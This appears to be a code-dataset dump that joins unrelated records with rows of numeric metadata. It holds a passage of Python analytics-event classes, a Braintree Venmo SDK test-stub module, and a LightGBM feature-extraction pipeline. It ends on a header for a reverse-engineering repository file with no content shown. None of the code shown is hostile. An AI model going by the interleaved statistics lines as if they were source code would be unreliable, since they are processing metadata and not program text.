platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'HiddenEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class VisibleEvent(NonInteractiveEvent): """ A NonInteractiveEvent that's emitted after a section LocationContext has become visible. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'VisibleEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class SuccessEvent(NonInteractiveEvent): """ A NonInteractiveEvent that is sent when a user action is successfully completed, like sending an email form. Attributes: message (str): Success message. location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'SuccessEvent' def __init__(self, message: str, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param message: Success message. :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, message=message, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaEvent(NonInteractiveEvent): """ The parent of non-interactive events that are triggered by a media player. It requires a MediaPlayerContext to detail the origin of the event. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaLoadEvent(MediaEvent): """ A MediaEvent that's emitted after a media item completes loading. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaLoadEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaPauseEvent(MediaEvent): """ A MediaEvent that's emitted after a media item pauses playback. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaPauseEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaStartEvent(MediaEvent): """ A MediaEvent that's emitted after a media item starts playback. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaStartEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaStopEvent(MediaEvent): """ A MediaEvent that's emitted after a media item stops playback. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaStopEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) def make_context(_type: str, **kwargs) -> AbstractContext: if _type == "AbstractContext": return AbstractContext(**kwargs) if _type == "AbstractGlobalContext": return AbstractGlobalContext(**kwargs) if _type == "ApplicationContext": return ApplicationContext(**kwargs) if _type == "CookieIdContext": return CookieIdContext(**kwargs) if _type == "HttpContext": return HttpContext(**kwargs) if _type == "PathContext": return PathContext(**kwargs) if _type == "SessionContext": return SessionContext(**kwargs) if _type == "MarketingContext": return MarketingContext(**kwargs) if _type == "AbstractLocationContext": return AbstractLocationContext(**kwargs) if _type == "InputContext": return InputContext(**kwargs) if _type == "PressableContext": return PressableContext(**kwargs) if _type == "LinkContext": return LinkContext(**kwargs) if _type == "RootLocationContext": return RootLocationContext(**kwargs) if _type == "ExpandableContext": return ExpandableContext(**kwargs) if _type == "MediaPlayerContext": return MediaPlayerContext(**kwargs) if _type == "NavigationContext": return NavigationContext(**kwargs) if _type == "OverlayContext": return OverlayContext(**kwargs) if _type == "ContentContext": return ContentContext(**kwargs) return AbstractContext(**kwargs) def make_event(_type: str, **kwargs) -> AbstractEvent: if _type == "AbstractEvent": return AbstractEvent(**kwargs) if _type == "InteractiveEvent": return InteractiveEvent(**kwargs) if _type == "NonInteractiveEvent": return NonInteractiveEvent(**kwargs) if _type == "ApplicationLoadedEvent": return ApplicationLoadedEvent(**kwargs) if _type == "FailureEvent": return FailureEvent(**kwargs) if _type == "InputChangeEvent": return InputChangeEvent(**kwargs) if _type == "PressEvent": return PressEvent(**kwargs) if _type == "HiddenEvent": return HiddenEvent(**kwargs) if _type == "VisibleEvent": return VisibleEvent(**kwargs) if _type == "SuccessEvent": return SuccessEvent(**kwargs) if _type == "MediaEvent": return MediaEvent(**kwargs) if _type == "MediaLoadEvent": return MediaLoadEvent(**kwargs) if _type == "MediaPauseEvent": return MediaPauseEvent(**kwargs) if _type == "MediaStartEvent": return MediaStartEvent(**kwargs) if _type == "MediaStopEvent": return MediaStopEvent(**kwargs) return AbstractEvent(**kwargs) def make_event_from_dict(obj: Dict[str, Any]) -> AbstractEvent: if not ('_type' in obj and 'location_stack' in obj and 'global_contexts' in obj): raise Exception('missing arguments') obj['location_stack'] = [make_context(**c) for c in obj['location_stack']] obj['global_contexts'] = [make_context( **c) for c in obj['global_contexts']] return make_event(**obj)
44.858407
171
0.6087
6,621
60,828
5.506117
0.047727
0.027869
0.029625
0.022712
0.84074
0.837338
0.824995
0.816519
0.807823
0.800856
0
0
0.333268
60,828
1,355
172
44.891513
0.898905
0.611445
0
0.567839
0
0
0.060484
0.007291
0
0
0
0
0
1
0.090452
false
0
0.007538
0
0.354271
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
9868a3c83ac515eca2dfb6182cc4bb983095e784
145
py
Python
src/__init__.py
U2328/md_template
6750ae65af8bebe32a71b57dc74ccf0c0fb6fa0d
[ "BSD-3-Clause" ]
null
null
null
src/__init__.py
U2328/md_template
6750ae65af8bebe32a71b57dc74ccf0c0fb6fa0d
[ "BSD-3-Clause" ]
null
null
null
src/__init__.py
U2328/md_template
6750ae65af8bebe32a71b57dc74ccf0c0fb6fa0d
[ "BSD-3-Clause" ]
null
null
null
from src.parsing import * from src.filtering import * from src.walking import * __all__ = parsing.__all__ + filtering.__all__ + walking.__all__
24.166667
63
0.77931
19
145
5.105263
0.368421
0.216495
0.268041
0
0
0
0
0
0
0
0
0
0.137931
145
5
64
29
0.776
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.75
0
0.75
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
986c25c08fe1ddc8d3b60a1b561610e28adf727d
312
py
Python
lib/python2.7/site-packages/braintree/test/venmo_sdk.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
182
2015-01-09T05:26:46.000Z
2022-03-16T14:10:06.000Z
lib/python2.7/site-packages/braintree/test/venmo_sdk.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
95
2015-02-24T23:29:56.000Z
2022-03-13T03:27:58.000Z
lib/python2.7/site-packages/braintree/test/venmo_sdk.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
93
2015-02-19T17:59:06.000Z
2022-03-19T17:01:25.000Z
def generate_test_payment_method_code(number): return "stub-" + number VisaPaymentMethodCode = generate_test_payment_method_code("4111111111111111") InvalidPaymentMethodCode = generate_test_payment_method_code("invalid-payment-method-code") Session = "stub-session" InvalidSession = "stub-invalid-session"
34.666667
91
0.830128
34
312
7.264706
0.441176
0.210526
0.275304
0.303644
0.352227
0
0
0
0
0
0
0.055556
0.076923
312
8
92
39
0.802083
0
0
0
1
0
0.25641
0.086538
0
0
0
0
0
1
0.166667
false
0
0
0.166667
0.333333
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
6
989341b0c66f106c3d19054bd87caab7a6a3206a
24,181
py
Python
pipelines.py
neptune-ml/open-solution-talking-data
1d68c7b119d3811765046d8506251a0d2ba06c6f
[ "MIT" ]
8
2018-04-16T07:15:23.000Z
2019-05-26T04:01:06.000Z
pipelines.py
neptune-ml/open-solution-talking-data
1d68c7b119d3811765046d8506251a0d2ba06c6f
[ "MIT" ]
18
2018-04-17T22:28:16.000Z
2018-04-26T16:55:26.000Z
pipelines.py
neptune-ml/open-solution-talking-data
1d68c7b119d3811765046d8506251a0d2ba06c6f
[ "MIT" ]
8
2018-04-16T07:15:25.000Z
2019-06-25T12:42:53.000Z
from functools import partial from sklearn.metrics import roc_auc_score import feature_extraction as fe from hyperparameter_tuning import RandomSearchOptimizer, NeptuneMonitor, SaveResults from steps.adapters import to_numpy_label_inputs, identity_inputs from steps.base import Step, Dummy from steps.misc import LightGBM def baseline(config, train_mode): if train_mode: features, features_valid = feature_extraction_v0(config, train_mode) light_gbm = classifier_lgbm((features, features_valid), config, train_mode) else: features = feature_extraction_v0(config, train_mode) light_gbm = classifier_lgbm(features, config, train_mode) output = Step(name='output', transformer=Dummy(), input_steps=[light_gbm], adapter={'y_pred': ([(light_gbm.name, 'prediction')]), }, cache_dirpath=config.env.cache_dirpath) return output def solution_1(config, train_mode): if train_mode: features, features_valid = feature_extraction_v1(config, train_mode, save_output=True, cache_output=True, load_saved_output=False) light_gbm = classifier_lgbm((features, features_valid), config, train_mode) else: features = feature_extraction_v1(config, train_mode, cache_output=True) light_gbm = classifier_lgbm(features, config, train_mode) output = Step(name='output', transformer=Dummy(), input_steps=[light_gbm], adapter={'y_pred': ([(light_gbm.name, 'prediction')]), }, cache_dirpath=config.env.cache_dirpath) return output def feature_extraction_v0(config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = _feature_by_type_splits(config, train_mode) categorical_features = Step(name='categorical_features', transformer=Dummy(), input_steps=[feature_by_type_split], adapter={'categorical_features': ( [(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) categorical_features_valid = Step(name='categorical_features_valid', transformer=Dummy(), input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( [(feature_by_type_split_valid.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) feature_combiner = _join_features(numerical_features=[], numerical_features_valid=[], categorical_features=[categorical_features], categorical_features_valid=[categorical_features_valid], config=config, train_mode=train_mode) return feature_combiner else: feature_by_type_split = _feature_by_type_splits(config, train_mode) categorical_features = Step(name='categorical_features', transformer=Dummy(), input_steps=[feature_by_type_split], adapter={'categorical_features': ( [(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) feature_combiner = _join_features(numerical_features=[], numerical_features_valid=[], categorical_features=[categorical_features], categorical_features_valid=[], config=config, train_mode=train_mode) return feature_combiner def feature_extraction_v1(config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = _feature_by_type_splits(config, train_mode) time_delta, time_delta_valid = _time_deltas((feature_by_type_split, feature_by_type_split_valid), config, train_mode, **kwargs) confidence_rate, confidence_rate_valid = _confidence_rates((feature_by_type_split, feature_by_type_split_valid), config, train_mode, **kwargs) feature_combiner, feature_combiner_valid = _join_features(numerical_features=[time_delta, confidence_rate], numerical_features_valid=[time_delta_valid, confidence_rate_valid], categorical_features=[time_delta, confidence_rate], categorical_features_valid=[time_delta_valid, confidence_rate_valid], config=config, train_mode=train_mode, **kwargs) return feature_combiner, feature_combiner_valid else: feature_by_type_split = _feature_by_type_splits(config, train_mode) time_delta = _time_deltas(feature_by_type_split, config, train_mode, **kwargs) confidence_rate = _confidence_rates(feature_by_type_split, config, train_mode, **kwargs) feature_combiner = _join_features(numerical_features=[time_delta, confidence_rate], numerical_features_valid=[], categorical_features=[time_delta, confidence_rate], categorical_features_valid=[], config=config, train_mode=train_mode, **kwargs) return feature_combiner def classifier_lgbm(features, config, train_mode, **kwargs): if train_mode: features_train, features_valid = features if config.random_search.light_gbm.n_runs: transformer = RandomSearchOptimizer(LightGBM, config.light_gbm, train_input_keys=[], valid_input_keys=['X_valid', 'y_valid'], score_func=roc_auc_score, maximize=True, n_runs=config.random_search.light_gbm.n_runs, callbacks=[NeptuneMonitor( **config.random_search.light_gbm.callbacks.neptune_monitor), SaveResults( **config.random_search.light_gbm.callbacks.save_results), ] ) else: transformer = LightGBM(**config.light_gbm) light_gbm = Step(name='light_gbm', transformer=transformer, input_data=['input'], input_steps=[features_train, features_valid], adapter={'X': ([(features_train.name, 'features')]), 'y': ([('input', 'y')], to_numpy_label_inputs), 'feature_names': ([(features_train.name, 'feature_names')]), 'categorical_features': ([(features_train.name, 'categorical_features')]), 'X_valid': ([(features_valid.name, 'features')]), 'y_valid': ([('input', 'y_valid')], to_numpy_label_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) else: light_gbm = Step(name='light_gbm', transformer=LightGBM(**config.light_gbm), input_steps=[features], adapter={'X': ([(features.name, 'features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return light_gbm def _feature_by_type_splits(config, train_mode): if train_mode: feature_by_type_split = Step(name='feature_by_type_split', transformer=fe.DataFrameByTypeSplitter(**config.dataframe_by_type_splitter), input_data=['input'], adapter={'X': ([('input', 'X')]), }, cache_dirpath=config.env.cache_dirpath) feature_by_type_split_valid = Step(name='feature_by_type_split_valid', transformer=feature_by_type_split, input_data=['input'], adapter={'X': ([('input', 'X_valid')]), }, cache_dirpath=config.env.cache_dirpath) return feature_by_type_split, feature_by_type_split_valid else: feature_by_type_split = Step(name='feature_by_type_split', transformer=fe.DataFrameByTypeSplitter(**config.dataframe_by_type_splitter), input_data=['input'], adapter={'X': ([('input', 'X')]), }, cache_dirpath=config.env.cache_dirpath) return feature_by_type_split def _categorical_frequency_filters(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers categorical_filter = Step(name='categorical_filter', transformer=fe.CategoricalFilter(**config.categorical_filter), input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) categorical_filter_valid = Step(name='categorical_filter_valid', transformer=categorical_filter, input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( [(feature_by_type_split_valid.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return categorical_filter, categorical_filter_valid else: feature_by_type_split = dispatchers categorical_filter = Step(name='categorical_filter', transformer=fe.CategoricalFilter(**config.categorical_filter), input_data=['input'], input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return categorical_filter def _target_encoders(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers target_encoder = Step(name='target_encoder', transformer=fe.TargetEncoder(**config.target_encoder), input_data=['input'], input_steps=[feature_by_type_split], adapter={'X': ([(feature_by_type_split.name, 'categorical_features')]), 'y': ([('input', 'y')], to_numpy_label_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) target_encoder_valid = Step(name='target_encoder_valid', transformer=target_encoder, input_data=['input'], input_steps=[feature_by_type_split_valid], adapter={'X': ([(feature_by_type_split_valid.name, 'categorical_features')]), 'y': ([('input', 'y_valid')], to_numpy_label_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return target_encoder, target_encoder_valid else: feature_by_type_split = dispatchers target_encoder = Step(name='target_encoder', transformer=fe.TargetEncoder(**config.target_encoder), input_data=['input'], input_steps=[feature_by_type_split], adapter={'X': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return target_encoder def _binary_encoders(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers binary_encoder = Step(name='binary_encoder', transformer=fe.BinaryEncoder(), input_steps=[feature_by_type_split], adapter={'X': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) binary_encoder_valid = Step(name='binary_encoder_valid', transformer=binary_encoder, input_steps=[feature_by_type_split_valid], adapter={'X': ([(feature_by_type_split_valid.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return binary_encoder, binary_encoder_valid else: feature_by_type_split = dispatchers binary_encoder = Step(name='binary_encoder', transformer=fe.BinaryEncoder(), input_steps=[feature_by_type_split], adapter={'X': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return binary_encoder def _time_deltas(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers time_delta = Step(name='time_delta', transformer=fe.TimeDelta(**config.time_delta), input_steps=[feature_by_type_split], adapter={'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'timestamp_features': ([(feature_by_type_split.name, 'timestamp_features')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) time_delta_valid = Step(name='time_delta_valid', transformer=time_delta, input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( [(feature_by_type_split_valid.name, 'categorical_features')]), 'timestamp_features': ( [(feature_by_type_split_valid.name, 'timestamp_features')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) return time_delta, time_delta_valid else: feature_by_type_split = dispatchers time_delta = Step(name='time_delta', transformer=fe.TimeDelta(**config.time_delta), input_steps=[feature_by_type_split], adapter={'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'timestamp_features': ([(feature_by_type_split.name, 'timestamp_features')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) return time_delta def _confidence_rates(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers confidence_rates = Step(name='confidence_rates', transformer=fe.ConfidenceRate(**config.confidence_rate), input_data=['input'], input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'target': ([('input', 'y')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) confidence_rates_valid = Step(name='confidence_rates_valid', transformer=confidence_rates, input_data=['input'], input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( [(feature_by_type_split_valid.name, 'categorical_features')]), 'target': ([('input', 'y_valid')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) return confidence_rates, confidence_rates_valid else: feature_by_type_split = dispatchers confidence_rates = Step(name='confidence_rates', transformer=fe.ConfidenceRate(**config.confidence_rate), input_data=['input'], input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'target': ([('input', 'y')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) return confidence_rates def _join_features(numerical_features, numerical_features_valid, categorical_features, categorical_features_valid, config, train_mode, **kwargs): if train_mode: feature_joiner = Step(name='feature_joiner', transformer=fe.FeatureJoiner(), input_steps=numerical_features + categorical_features, adapter={ 'numerical_feature_list': ( [(feature.name, 'numerical_features') for feature in numerical_features], identity_inputs), 'categorical_feature_list': ( [(feature.name, 'categorical_features') for feature in categorical_features], identity_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) feature_joiner_valid = Step(name='feature_joiner_valid', transformer=feature_joiner, input_steps=numerical_features_valid + categorical_features_valid, adapter={'numerical_feature_list': ( [(feature.name, 'numerical_features') for feature in numerical_features_valid], identity_inputs), 'categorical_feature_list': ( [(feature.name, 'categorical_features') for feature in categorical_features_valid], identity_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return feature_joiner, feature_joiner_valid else: feature_joiner = Step(name='feature_joiner', transformer=fe.FeatureJoiner(), input_steps=numerical_features + categorical_features, adapter={ 'numerical_feature_list': ( [(feature.name, 'numerical_features') for feature in numerical_features], identity_inputs), 'categorical_feature_list': ( [(feature.name, 'categorical_features') for feature in categorical_features], identity_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return feature_joiner PIPELINES = {'baseline': {'train': partial(baseline, train_mode=True), 'inference': partial(baseline, train_mode=False)}, 'solution_1': {'train': partial(solution_1, train_mode=True), 'inference': partial(solution_1, train_mode=False)}, }
54.096197
120
0.4774
1,857
24,181
5.785676
0.063005
0.046351
0.098008
0.127327
0.857781
0.829952
0.805007
0.76815
0.738086
0.727755
0
0.000746
0.445846
24,181
446
121
54.217489
0.801045
0
0
0.646597
0
0
0.07386
0.011538
0
0
0
0
0
1
0.031414
false
0
0.018325
0
0.104712
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
7f91a6df989566483a9fa8128916e06c331a7d8e
42,212
py
Python
Blog_Pack/blog_pack.py
Alpha-Demon404/RE-14
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
[ "MIT" ]
39
2020-02-26T09:44:36.000Z
2022-03-23T00:18:25.000Z
Blog_Pack/blog_pack.py
B4BY-DG/reverse-enginnering
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
[ "MIT" ]
15
2020-05-14T10:07:26.000Z
2022-01-06T02:55:32.000Z
Blog_Pack/blog_pack.py
B4BY-DG/reverse-enginnering
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
[ "MIT" ]
41
2020-03-16T22:36:38.000Z
2022-03-17T14:47:19.000Z
